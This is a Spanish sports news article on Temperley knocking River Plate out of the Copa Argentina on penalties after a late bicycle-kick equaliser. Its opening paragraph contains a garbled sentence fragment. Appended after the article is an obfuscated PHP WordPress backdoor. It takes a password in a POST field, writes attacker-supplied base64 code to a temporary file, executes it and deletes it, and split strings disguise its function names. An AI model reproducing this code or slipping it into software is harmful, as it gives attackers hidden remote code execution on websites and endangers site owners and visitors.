Temperley, con un golazo agónico y eficacia en los penales, dio la sorpresa y eliminó a River Plate

Temperley y River Plate igualaron 1-1 y en el desempate por penales ganó el Celeste 5-4, en el estadio Malvinas Argentinas de Mendoza, por los dieciseisavos de final de la Copa Argentina. en la definición por penales para ser eliminado en los 16avos de final de la Copa Argentina. Otra gran sorpresa con un equipo del ascenso eliminando a uno de la Liga Profesional.

Dos golazos le dieron lustre a los 90 minutos. El ingresado Esequiel Barco le pegó magníficamente en un tiro libre para poner en ventaja al Millonario, a los 6 minutos del segundo tiempo. Lo tenía controlado, aunque sin lucirse, River ante un Temperley que jamás se entregó.

Parecía liquidado el partido, pero en el segundo minuto de descuento un tremendo golazo equiparó el resultado y desembocó en la definición por penales. El héroe del conjunto de Primera Nacional fue Fernando Martínez con un impresionante remate de tijera.

Martínez, el autor de esa joya, tiene 23 años, surgió de Gimnasia y Esgrima La Plata y luego jugó en Central Córdoba de Santiago del Estero y en Potencia de Uruguay. El lateral derecho se sumó a Temperley a principios de este año.

En la serie de penales, por Temperley que comenzó pateando, convirtieron Francisco Ilarregui, Pedro Souto, Jorge Scolari y Luis Animal López, mientras que Emanuel Ibañez remató desviado. Por el lado de River anotaron Facundo Colidio, Santiago Simón, Nicolás Fonseca y Agustín Sant´Anna. El remate de Esequiel Barco fue atajado por Francisco Rago.

Igualada en 4, esa tanda de cinco penales por equipos, se pasó a la siguiente ronda. Convirtió Juan Pablo Segovia para Temperley, y Francisco Rago volvió a encenderse atajando el disparo de David Martínez.

Con esta atajada, el Gasolero extendió su fiesta, que había arrancado con el golazo agónico de Martínez, hasta el éxtasis total, en la cancha los jugadores y cuerpo técnico y en la tribuna la alta cantidad de hinchas que viajaron para apoyar a su equipo.

Mitre de Santiago del Estero, que eliminó a Gimnasia y esgrima de Mendoza, 1-0, con un agónico gol de Gaspar Triverio, el miércoles pasado, será el rival de Temperley en la próxima fase, los octavos de final.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}